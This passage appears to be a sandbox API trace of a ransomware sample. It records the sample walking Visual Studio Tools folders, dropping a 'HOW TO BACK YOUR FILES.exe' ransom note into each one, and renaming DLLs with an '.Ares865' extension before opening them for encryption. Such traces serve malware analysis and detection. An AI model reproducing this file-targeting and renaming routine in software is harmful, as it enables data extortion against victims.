ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535ca1a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppInfoDocument", cAlternateFileName="APPINF~1")) returned 1 [0148.330] lstrcmpiW (lpString1="AppInfoDocument", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.330] lstrcmpiW (lpString1="AppInfoDocument", lpString2="aoldtz.exe") returned 1 [0148.330] lstrcpyW (in: lpString1=0x2cce474, lpString2="AppInfoDocument" | out: lpString1="AppInfoDocument") returned="AppInfoDocument" [0148.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0148.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x31afc8 [0148.330] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7bd0 [0148.330] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5357dee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.330] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.331] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pipeline.v10.0", cAlternateFileName="PIPELI~1.0")) returned 1 [0148.331] lstrcmpiW (lpString1="Pipeline.v10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.331] lstrcmpiW (lpString1="Pipeline.v10.0", lpString2="aoldtz.exe") returned 1 [0148.331] lstrcpyW (in: lpString1=0x2cce474, lpString2="Pipeline.v10.0" | out: lpString1="Pipeline.v10.0") returned="Pipeline.v10.0" [0148.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0148.331] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x92) returned 0x31b068 [0148.331] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0148.331] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pipeline.v10.0", cAlternateFileName="PIPELI~1.0")) returned 0 [0148.331] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0148.331] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0148.331] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" [0148.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31b068 | out: hHeap=0x2b0000) returned 1 [0148.331] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0148.331] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned 72 [0148.331] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0" [0148.331] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.331] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.332] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.332] GetLastError () returned 0x0 [0148.332] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.333] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.333] CloseHandle (hObject=0x120) returned 1 [0148.333] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.333] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.333] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20323f10, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5357dee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.333] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.333] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.333] lstrcpyW (in: lpString1=0x2cce492, lpString2="AddInSideAdapters" | out: lpString1="AddInSideAdapters") returned="AddInSideAdapters" [0148.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0148.333] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb6) returned 0x324fc8 [0148.333] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7cb0 [0148.333] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69acfbd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AddInViews", cAlternateFileName="ADDINV~1")) returned 1 [0148.333] lstrcmpiW (lpString1="AddInViews", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.333] lstrcmpiW (lpString1="AddInViews", lpString2="aoldtz.exe") returned -1 [0148.334] lstrcpyW (in: lpString1=0x2cce492, lpString2="AddInViews" | out: lpString1="AddInViews") returned="AddInViews" [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa8) returned 0x2f2fc8 [0148.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7b90 [0148.334] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52328bf0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contracts", cAlternateFileName="CONTRA~1")) returned 1 [0148.334] lstrcmpiW (lpString1="Contracts", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.334] lstrcmpiW (lpString1="Contracts", lpString2="aoldtz.exe") returned 1 [0148.334] lstrcpyW (in: lpString1=0x2cce492, lpString2="Contracts" | out: lpString1="Contracts") returned="Contracts" [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7808 [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2f3078 [0148.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7810 | out: ListHead=0x2e7710, ListEntry=0x2e7810) returned 0x2e7c30 [0148.334] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HostSideAdapters", cAlternateFileName="HOSTSI~1")) returned 1 [0148.334] lstrcmpiW (lpString1="HostSideAdapters", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.334] lstrcmpiW (lpString1="HostSideAdapters", lpString2="aoldtz.exe") returned 1 [0148.334] lstrcpyW (in: lpString1=0x2cce492, lpString2="HostSideAdapters" | out: lpString1="HostSideAdapters") returned="HostSideAdapters" [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0148.334] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x325088 [0148.334] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77d0 | out: ListHead=0x2e7710, ListEntry=0x2e77d0) returned 0x2e7810 [0148.334] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5357dee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x5357dee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0148.335] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0148.335] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed38dba0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0x6192a2b0, ftLastAccessTime.dwHighDateTime=0x1d2dda2, ftLastWriteTime.dwLowDateTime=0xed4e4800, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1fdc1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PipelineSegments.store", cAlternateFileName="PIPELI~1.STO")) returned 1 [0148.335] lstrcmpiW (lpString1="PipelineSegments.store", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0148.335] lstrcmpiW (lpString1="PipelineSegments.store", lpString2="aoldtz.exe") returned 1 [0148.335] lstrcpyW (in: lpString1=0x2cce492, lpString2="PipelineSegments.store" | out: lpString1="PipelineSegments.store") returned="PipelineSegments.store" [0148.335] lstrlenW (lpString="PipelineSegments.store") returned 22 [0148.335] lstrlenW (lpString="Ares865") returned 7 [0148.335] lstrcmpiW (lpString1="s.store", lpString2="Ares865") returned 1 [0148.335] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.Ares865") returned 103 [0148.335] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store.ares865"), dwFlags=0x1) returned 1 [0148.337] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\PipelineSegments.store.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\pipelinesegments.store.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=130497) returned 1 [0148.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.337] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.347] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" [0148.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325088 | out: hHeap=0x2b0000) returned 1 [0148.347] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e77c8 | out: hHeap=0x2b0000) returned 1 [0148.347] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned 89 [0148.347] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters" [0148.347] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0148.347] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\how to back your files.exe"), bFailIfExists=1) returned 0 [0148.348] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0148.348] GetLastError () returned 0x0 [0148.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0148.348] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0148.348] CloseHandle (hObject=0x120) returned 1 [0148.348] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0148.349] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0148.349] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x583906f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x535a4040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x535a4040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0148.349] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0148.349] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0148.349] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" [0148.349] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll") returned 63 [0148.349] lstrlenW (lpString="Ares865") returned 7 [0148.349] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.349] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.Ares865") returned 161 [0148.349] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.352] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.applications.hostadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35256) returned 1 [0148.352] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.353] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.357] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" [0148.357] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll") returned 63 [0148.357] lstrlenW (lpString="Ares865") returned 7 [0148.357] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.358] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll.Ares865") returned 161 [0148.358] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.360] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.excel.hostadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.360] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77752) returned 1 [0148.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.360] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.367] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" [0148.367] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll") returned 57 [0148.367] lstrlenW (lpString="Ares865") returned 7 [0148.367] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.367] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll.Ares865") returned 155 [0148.367] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll.ares865"), dwFlags=0x1) returned 1 [0148.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsta\\pipeline.v10.0\\hostsideadapters\\microsoft.visualstudio.tools.office.hostadapter.v10.0.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0148.369] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63408) returned 1 [0148.369] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0148.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0148.370] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0148.378] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll") returned="Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" [0148.378] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll") returned 65 [0148.378] lstrlenW (lpString="Ares865") returned 7 [0148.378] lstrcmpiW (lpString1="0.0.dll", lpString2="Ares865") returned -1 [0148.378] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll.Ares865") returned 163 [0148.378] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTA\\Pipeline.v10.0\\HostSideAdapters\\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.dll" (normalized: "c:\\program files 